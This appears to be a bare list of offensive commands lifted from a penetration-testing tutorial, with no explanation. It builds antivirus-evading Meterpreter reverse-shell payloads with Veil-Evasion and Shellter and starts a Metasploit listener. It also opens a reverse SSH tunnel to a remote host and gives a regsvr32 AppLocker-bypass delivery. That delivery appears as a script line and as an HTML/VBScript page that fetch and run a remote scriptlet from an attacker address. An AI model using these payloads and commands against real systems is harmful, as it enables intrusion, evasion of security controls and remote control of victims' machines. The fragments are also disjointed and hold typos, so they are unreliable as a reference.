netsh advFirewall firewall set rule group="windows remote management" new enable=yes
use windows/meterpreter/reverse_tcp_rc4
apt-get install veil-evasion
info <payload number / payload name>
info python/shellcode_inject/aes_encrypt
kali@linux:~./Veil-Evasion.py -p python/shellcode_inject aes_encrypt  -o -output --msfpayload windows/meterpreter/reverse_tcp --msfoptions LHOST=192.168.43.134 LPORT=4444  
apt-get install shellter
shellter
starting the listner
       use exploit/multi/handler 
      set payload windows/meterpretere/reverse_HTTPS 
      set lhost 192.168.1.102 
      set lport 5544 
      set exitonsession false 
      exploit -j -z 
ssh -R 2210:localhost:443 -p 443 remotehacker@61.x.x.142
ssh -p 2210 localhost 
use exploit/windows/misc/regsvr32_applocker_bypass_server
var objShell = new ActiveXObject("WScript.shell");  objShell.run('regsvr32 /s /n /u /i:http://192.168.0.120:8080/uN37T7wcYosiHX.sct scrobj.dll'); 
HTML Code 
          <html> 
        <head> 
        <script language="VBScript"> 
          set objShell = CreateObject ("Wscript.Shell") 
          objShell.Run "regsvr32 /s /n /u /i:http://192.168.0.120:8080/uN37T7wcYosiHX.sct scrobj.dll" 
        </script> 
        </head> 
        <body> 
        </body> 
        </html> 
 C:\> whoami /groups 
 
